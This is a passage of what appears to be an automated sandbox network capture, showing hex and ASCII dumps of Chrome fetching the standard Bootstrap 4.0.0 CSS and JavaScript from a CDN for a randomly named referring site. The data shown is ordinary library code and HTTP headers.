                                                                                                                                                                2024-11-23 19:35:59 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                8192.168.2.449752104.18.11.2074434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:00 UTC635OUTGET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1
                                                                                                                                                                Host: maxcdn.bootstrapcdn.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                Origin: http://nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                Referer: http://nova-drive.xkndniwljldraoauu.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                2024-11-23 19:36:01 UTC939INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:01 GMT
                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                CDN-PullZone: 252412
                                                                                                                                                                CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                                                CDN-RequestCountryCode: US
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Cache-Control: public, max-age=31919000
                                                                                                                                                                ETag: W/"450fc463b8b1a349df717056fbb3e078"
                                                                                                                                                                Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                                                                                                                CDN-ProxyVer: 1.06
                                                                                                                                                                CDN-RequestPullSuccess: True
                                                                                                                                                                CDN-RequestPullCode: 200
                                                                                                                                                                CDN-CachedAt: 11/15/2024 13:24:43
                                                                                                                                                                CDN-EdgeStorageId: 718
                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                CDN-Status: 200
                                                                                                                                                                CDN-RequestTime: 0
                                                                                                                                                                CDN-RequestId: 67882d80353720155d8234defd143570
                                                                                                                                                                CDN-Cache: HIT
                                                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8e739b0ebabb8c95-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2024-11-23 19:36:01 UTC430INData Raw: 37 63 30 37 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30
                                                                                                                                                                Data Ascii: 7c07/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */:root{--blue:#007bff;--indigo:#6610
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 30 3b 2d 2d 70 72 69 6d 61 72 79 3a 23 30 30 37 62 66 66 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 23 36 63 37 35 37 64 3b 2d 2d 73 75 63 63 65 73 73 3a 23 32 38 61 37 34 35 3b 2d 2d 69 6e 66 6f 3a 23 31 37 61 32 62 38 3b 2d 2d 77 61 72 6e 69 6e 67 3a 23 66 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6d 64 3a 37 36 38 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6c 67 3a 39 39 32 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 6c 3a 31 32 30 30 70 78 3b 2d 2d 66 6f 6e 74 2d 66 61
                                                                                                                                                                Data Ascii: 0;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-fa
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 63 75 72 73 6f 72 3a 68 65 6c 70 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 6c 20 75 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 64 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d
                                                                                                                                                                Data Ascii: -decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 2c 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b 74 79 70 65 3d 62 75 74 74 6f
                                                                                                                                                                Data Ascii: e:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=butto
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 36 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65 6d 7d 2e 68 34 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 68 35 2c 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 7d 2e 68 36 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 66
                                                                                                                                                                Data Ascii: 6{margin-bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25rem;f
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 46 4d 6f 6e 6f 2d 52 65 67 75 6c 61 72 2c 4d 65 6e 6c 6f 2c 4d 6f 6e 61 63 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 22 43 6f 75 72 69 65 72 20 4e 65 77 22 2c 6d 6f 6e 6f 73 70 61 63 65 7d 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 65 38 33 65 38 63 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f 64 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 32 72 65 6d 20 2e 34 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 62 6f 72
                                                                                                                                                                Data Ascii: e,samp{font-family:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}code{font-size:87.5%;color:#e83e8c;word-break:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:87.5%;color:#fff;background-color:#212529;bor
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 6c 67 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 6d 64 2c 2e 63 6f 6c 2d 6d 64 2d 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 30 2c 2e 63 6f 6c 2d 6d 64 2d 31 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 2c 2e 63 6f 6c 2d 6d 64 2d 33 2c 2e 63 6f 6c 2d 6d 64 2d 34 2c 2e 63 6f 6c 2d 6d 64 2d 35 2c 2e 63 6f 6c 2d 6d 64 2d 36 2c 2e 63 6f 6c 2d 6d 64 2d 37 2c 2e 63 6f 6c 2d 6d 64 2d 38 2c 2e 63 6f 6c 2d 6d 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 73 6d 2c 2e 63 6f 6c 2d 73 6d 2d 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 2c 2e 63 6f 6c 2d 73 6d 2d 33 2c 2e 63 6f 6c 2d 73 6d 2d 34 2c 2e 63 6f 6c 2d 73 6d 2d 35 2c 2e 63 6f 6c 2d 73 6d 2d 36 2c 2e 63
                                                                                                                                                                Data Ascii: lg-auto,.col-md,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.c
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 36 36 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 39 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 37 35 25 7d 2e 63 6f 6c 2d 31 30 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 31 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39
                                                                                                                                                                Data Ascii: 66.666667%;max-width:66.666667%}.col-9{-webkit-box-flex:0;-ms-flex:0 0 75%;flex:0 0 75%;max-width:75%}.col-10{-webkit-box-flex:0;-ms-flex:0 0 83.333333%;flex:0 0 83.333333%;max-width:83.333333%}.col-11{-webkit-box-flex:0;-ms-flex:0 0 91.666667%;flex:0 0 9
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 31 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 33 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 35 25 7d 2e 6f 66 66 73 65 74 2d 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 31 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 36 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 30 25 7d 2e 6f 66 66 73 65 74 2d 37 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 2e 6f 66 66 73 65 74 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 33 2e 33 33 33 33 33 33 25 7d
                                                                                                                                                                Data Ascii: 16.666667%}.offset-3{margin-left:25%}.offset-4{margin-left:33.333333%}.offset-5{margin-left:41.666667%}.offset-6{margin-left:50%}.offset-7{margin-left:58.333333%}.offset-8{margin-left:66.666667%}.offset-9{margin-left:75%}.offset-10{margin-left:83.333333%}
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 25 3b 6d 61 78 2d 77 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 32 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 73 6d 2d 66 69 72 73 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 30 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d
                                                                                                                                                                Data Ascii: %;max-width:83.333333%}.col-sm-11{-webkit-box-flex:0;-ms-flex:0 0 91.666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-sm-12{-webkit-box-flex:0;-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.order-sm-first{-webkit-box-ordinal-group:0;-ms-flex-order:-


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                9192.168.2.449753104.18.11.2074434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:00 UTC619OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                                                                                                                                                                Host: maxcdn.bootstrapcdn.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                Origin: http://nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                Accept: */*
                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                Referer: http://nova-drive.xkndniwljldraoauu.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                2024-11-23 19:36:01 UTC954INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:01 GMT
                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                CDN-PullZone: 252412
                                                                                                                                                                CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                                                CDN-RequestCountryCode: US
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Cache-Control: public, max-age=31919000
                                                                                                                                                                ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                                                                                                                                                                Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                                                                                                                CDN-ProxyVer: 1.06
                                                                                                                                                                CDN-RequestPullSuccess: True
                                                                                                                                                                CDN-RequestPullCode: 200
                                                                                                                                                                CDN-CachedAt: 11/06/2024 23:22:44
                                                                                                                                                                CDN-EdgeStorageId: 1067
                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                CDN-Status: 200
                                                                                                                                                                CDN-RequestTime: 0
                                                                                                                                                                CDN-RequestId: 3dfcb4ab76e192d20b1796af474e9a80
                                                                                                                                                                CDN-Cache: HIT
                                                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8e739b0eaa248c8d-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2024-11-23 19:36:01 UTC415INData Raw: 37 62 66 39 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                                                                                                                                Data Ascii: 7bf9/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c
                                                                                                                                                                Data Ascii: s","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 74 28 6e 29 2e 74 72 69 67 67 65 72 28 65 2e 65 6e 64 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c 65 6d 65 6e 74 28 6f 29 3f 22 65 6c
                                                                                                                                                                Data Ascii: t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isElement(o)?"el
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 2e 43 4c 4f 53 45 29 3b 72 65 74 75 72 6e 20 6f 28 74 29 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28
                                                                                                                                                                Data Ascii: .CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._destroyElement(
